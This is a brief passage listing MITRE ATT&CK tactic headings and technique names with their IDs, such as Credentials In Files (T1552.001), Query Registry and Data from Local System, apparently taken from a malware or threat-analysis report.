Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact